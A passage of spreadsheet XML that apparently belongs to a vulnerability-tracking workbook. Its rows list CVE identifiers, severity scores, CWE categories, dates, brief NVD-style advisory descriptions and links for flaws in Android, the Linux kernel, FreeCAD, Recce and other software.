          <t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28664</t>
        </is>
      </c>
      <c r="C2046" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2046" s="5" t="inlineStr"/>
      <c r="F2046" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2046" s="5" t="inlineStr"/>
      <c r="H2046" s="5" t="inlineStr"/>
      <c r="I2046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2046" s="5" t="inlineStr"/>
      <c r="K2046" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2046" s="5" t="inlineStr">
        <is>
          <t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t>
        </is>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28668</t>
        </is>
      </c>
      <c r="C2047" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2047" s="5" t="inlineStr"/>
      <c r="F2047" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2047" s="5" t="inlineStr"/>
      <c r="H2047" s="5" t="inlineStr"/>
      <c r="I2047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2047" s="5" t="inlineStr"/>
      <c r="K2047" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2047" s="5" t="inlineStr">
        <is>
          <t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t>
        </is>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30512</t>
        </is>
      </c>
      <c r="C2048" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2048" s="5" t="inlineStr"/>
      <c r="F2048" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2048" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2048" s="5" t="inlineStr"/>
      <c r="I2048" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2048" s="5" t="inlineStr"/>
      <c r="K2048" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L2048" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the Restricted Access (Kiosk) Mode implementation of Scheidt &amp; Bachmann entervo HMI prior to V2 R5 P0 M5. The vulnerability affects the external PDF viewer functionality used to display the application manual and its interaction with the underlying Windows operating system. An authenticated low-privileged user can escape the kiosk environment by opening the application manual in the external PDF viewer and abusing the print functionality. Successful exploitation allows execution of arbitrary commands outside the kiosk environment with local administrator privileges.</t>
        </is>
      </c>
      <c r="M2048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30512</t>
        </is>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34398</t>
        </is>
      </c>
      <c r="C2049" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2049" s="5" t="inlineStr"/>
      <c r="F2049" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2049" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2049" s="5" t="inlineStr"/>
      <c r="I2049" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2049" s="5" t="inlineStr"/>
      <c r="K2049" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2049" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, src/Mod/BIM/bimcommands/BimProjectManager.py in the BIM Project Manager Load Template flow passes attacker-controlled FCStd Meta property values for wpposition, wpu, wpv, and wpaxis directly to eval(), allowing arbitrary Python code execution when a user loads a malicious BIM project template. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M2049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34398</t>
        </is>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34399</t>
        </is>
      </c>
      <c r="C2050" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2050" s="5" t="inlineStr"/>
      <c r="F2050" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2050" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2050" s="5" t="inlineStr"/>
      <c r="I2050" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2050" s="5" t="inlineStr"/>
      <c r="K2050" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2050" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, FreeCAD's BIM Workbench contains an eval() call on untrusted data from SVG template files. When a user creates a TechDraw page from a malicious SVG template, arbitrary Python code executes. The vulnerable code is in src/Mod/BIM/bimcommands/BimTDPage.py (line 87). This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M2050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34399</t>
        </is>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45200</t>
        </is>
      </c>
      <c r="C2051" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2051" s="5" t="inlineStr"/>
      <c r="F2051" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2051" s="5" t="inlineStr"/>
      <c r="H2051" s="5" t="inlineStr"/>
      <c r="I2051" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2051" s="5" t="inlineStr"/>
      <c r="K2051" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2051" s="5" t="inlineStr">
        <is>
          <t>Software installed and run as a non-privileged user may conduct improper GPU driver IOCTL calls to create an allocation scenario that when freed would cause double free and kernel heap corruption.
Scenario caused by fabricating a specific combination of flags on the allocation interface that would cause an incorrect double free event when freed.</t>
        </is>
      </c>
      <c r="M2051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45200</t>
        </is>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45515</t>
        </is>
      </c>
      <c r="C2052" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2052" s="5" t="inlineStr"/>
      <c r="F2052" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2052" s="5" t="inlineStr"/>
      <c r="H2052" s="5" t="inlineStr"/>
      <c r="I2052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2052" s="5" t="inlineStr"/>
      <c r="K2052" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L2052" s="5" t="inlineStr">
        <is>
          <t>In a2dp_vendor_opus_decoder_decode_packet of a2dp_vendor_opus_decoder.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t>
        </is>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="C2053" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2053" s="5" t="inlineStr"/>
      <c r="F2053" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2053" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2053" s="5" t="inlineStr"/>
      <c r="I2053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2053" s="5" t="inlineStr"/>
      <c r="K2053" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2053" s="5" t="inlineStr">
        <is>
          <t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45531</t>
        </is>
      </c>
      <c r="C2054" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2054" s="5" t="inlineStr"/>
      <c r="F2054" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2054" s="5" t="inlineStr"/>
      <c r="H2054" s="5" t="inlineStr"/>
      <c r="I2054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2054" s="5" t="inlineStr"/>
      <c r="K2054" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2054" s="5" t="inlineStr">
        <is>
          <t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t>
        </is>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45998</t>
        </is>
      </c>
      <c r="C2055" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2055" s="5" t="inlineStr"/>
      <c r="F2055" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2055" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2055" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2055" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J2055" s="5" t="inlineStr"/>
      <c r="K2055" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L2055" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rxrpc: Fix potential UAF after skb_unshare() failure
If skb_unshare() fails to unshare a packet due to allocation failure in
rxrpc_input_packet(), the skb pointer in the parent (rxrpc_io_thread())
will be NULL'd out.  This will likely cause the call to
trace_rxrpc_rx_done() to oops.
Fix this by moving the unsharing down to where rxrpc_input_call_event()
calls rxrpc_input_call_packet().  There are a number of places prior to
that where we ignore DATA packets for a variety of reasons (such as the
call already being complete) for which an unshare is then avoided.
And with that, rxrpc_input_packet() doesn't need to take a pointer to the
pointer to the packet, so change that to just a pointer.</t>
        </is>
      </c>
      <c r="M2055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45998</t>
        </is>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46117</t>
        </is>
      </c>
      <c r="C2056" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2056" s="5" t="inlineStr"/>
      <c r="F2056" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2056" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2056" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2056" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2056" s="5" t="inlineStr"/>
      <c r="K2056" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-617</t>
        </is>
      </c>
      <c r="L2056" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Remove user triggerable WARN_ON() in mana_ib_create_qp_rss()
Sashiko points out that the user can specify WQs sharing the same CQ as a
part of the uAPI and this will trigger the WARN_ON() then go on to corrupt
the kernel.
Just reject it outright and fail the QP creation.</t>
        </is>
      </c>
      <c r="M2056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46117</t>
        </is>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46145</t>
        </is>
      </c>
      <c r="C2057" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2057" s="5" t="inlineStr"/>
      <c r="F2057" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2057" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2057" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2057" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2057" s="5" t="inlineStr"/>
      <c r="K2057" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2057" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Validate rx_hash_key_len
Sashiko points out that rx_hash_key_len comes from a uAPI structure and is
blindly passed to memcpy, allowing the userspace to trash kernel
memory. Bounds check it so the memcpy cannot overflow.</t>
        </is>
      </c>
      <c r="M2057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46145</t>
        </is>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46189</t>
        </is>
      </c>
      <c r="C2058" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2058" s="5" t="inlineStr"/>
      <c r="F2058" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2058" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2058" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2058" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2058" s="5" t="inlineStr"/>
      <c r="K2058" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-763</t>
        </is>
      </c>
      <c r="L2058" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/vmw_pvrdma: Fix double free on pvrdma_alloc_ucontext() error path
Sashiko points out that pvrdma_uar_free() is already called within
pvrdma_dealloc_ucontext(), so calling it before triggers a double free.</t>
        </is>
      </c>
      <c r="M2058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46189</t>
        </is>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48097</t>
        </is>
      </c>
      <c r="C2059" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2059" s="5" t="inlineStr"/>
      <c r="F2059" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2059" s="5" t="inlineStr"/>
      <c r="H2059" s="5" t="inlineStr"/>
      <c r="I2059" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2059" s="5" t="inlineStr"/>
      <c r="K2059" s="5" t="inlineStr">
        <is>
          <t>CWE-476, CWE-78</t>
        </is>
      </c>
      <c r="L2059" s="5" t="inlineStr">
        <is>
          <t>NexTor IP Changer is a command-line tool that leverages the Tor network to periodically rotate a user's IP address. Versions prior to 2.0.0 have a command execution vulnerability due to unsafe use of `shell=True` with commands that rely on executable resolution through the `PATH` environment variable. An attacker controlling the execution environment can place malicious executables such as sudo earlier in the `PATH`, resulting in execution of attacker-controlled code. Version 2.0.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M2059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48097</t>
        </is>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49360</t>
        </is>
      </c>
      <c r="C2060" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2060" s="5" t="inlineStr"/>
      <c r="F2060" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2060" s="5" t="inlineStr"/>
      <c r="H2060" s="5" t="inlineStr"/>
      <c r="I2060" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2060" s="5" t="inlineStr"/>
      <c r="K2060" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2060" s="5" t="inlineStr">
        <is>
          <t>Recce is a data-validation toolkit for enhanced dbt (data build tool) PR review. Prior to version 1.50.0, OSS server deployments that expose the server to an untrusted network without authentication are vulnerable to unauthenticated SQL execution through the query run API. When Recce is configured with a DuckDB-backed project, an attacker can use DuckDB filesystem primitives to read and write files accessible to the Recce server process. The impact depends on how Recce is deployed, but may include disclosure of local files, tampering with Recce/dbt artifacts, modification of browser-served static files leading to stored XSS, and modification of application files if those paths are writable. If Recce is run as root, file access occurs with root privileges inside that host or container. This issue has been patched in Recce `v1.50.0`. Users should upgrade to Recce `v1.50.0` or later. The patch restricts unsafe file read/write behavior for DuckDB-backed query execution and hardens the affected query path. Other warehouse adapters have also been reviewed for similar exposure. Users who cannot upgrade immediately should avoid exposing `recce server` to the public internet or any untrusted network. Recommended mitigations include enabling authentication or placing Recce behind an authenticated reverse proxy/VPN, running Recce as a non-root user, using a read-only application filesystem where possible, and ensuring that sensitive files or credentials are not available to the Recce process.</t>
        </is>
      </c>
      <c r="M2060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49360</t>
        </is>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="C2061" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2061" s="5" t="inlineStr"/>
      <c r="F2061" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2061" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2061" s="5" t="inlineStr"/>
      <c r="I2061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2061" s="5" t="inlineStr"/>
      <c r="K2061" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2061" s="5" t="inlineStr">
        <is>
          <t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49884</t>
        </is>
      </c>
      <c r="C2062" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2062" s="5" t="inlineStr"/>
      <c r="F2062" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2062" s="5" t="inlineStr"/>
      <c r="H2062" s="5" t="inlineStr"/>
      <c r="I2062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2062" s="5" t="inlineStr"/>
      <c r="K2062" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2062" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t>
        </is>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49887</t>
        </is>
      </c>
      <c r="C2063" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2063" s="5" t="inlineStr"/>
      <c r="F2063" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2063" s="5" t="inlineStr"/>
      <c r="H2063" s="5" t="inlineStr"/>
      <c r="I2063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2063" s="5" t="inlineStr"/>
      <c r="K2063" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2063" s="5" t="inlineStr">
        <is>
          <t>In maybeRemoveInvalidInstallerPackageName of InstallRepository.kt, there is a possible unauthorized app update due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t>
        </is>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49918</t>
        </is>
      </c>
      <c r="C2064" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2064" s="5" t="inlineStr"/>
      <c r="F2064" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2064" s="5" t="inlineStr"/>
      <c r="H2064" s="5" t="inlineStr"/>
      <c r="I2064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2064" s="5" t="inlineStr"/>
      <c r="K2064" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2064" s="5" t="inlineStr">
        <is>
          <t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t>
        </is>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49919</t>
        </is>
      </c>
      <c r="C2065" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2065" s="5" t="inlineStr"/>
      <c r="F2065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2065" s="5" t="inlineStr"/>
      <c r="H2065" s="5" t="inlineStr"/>
      <c r="I2065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2065" s="5" t="inlineStr"/>
      <c r="K2065" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2065" s="5" t="inlineStr">
        <is>
          <t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t>
        </is>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49927</t>
        </is>
      </c>
      <c r="C2066" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2066" s="5" t="inlineStr"/>
      <c r="F2066" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2066" s="5" t="inlineStr"/>
      <c r="H2066" s="5" t="inlineStr"/>
      <c r="I2066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2066" s="5" t="inlineStr"/>
      <c r="K2066" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2066" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t>
        </is>
      </c>
    </row>
    <row r="2067">
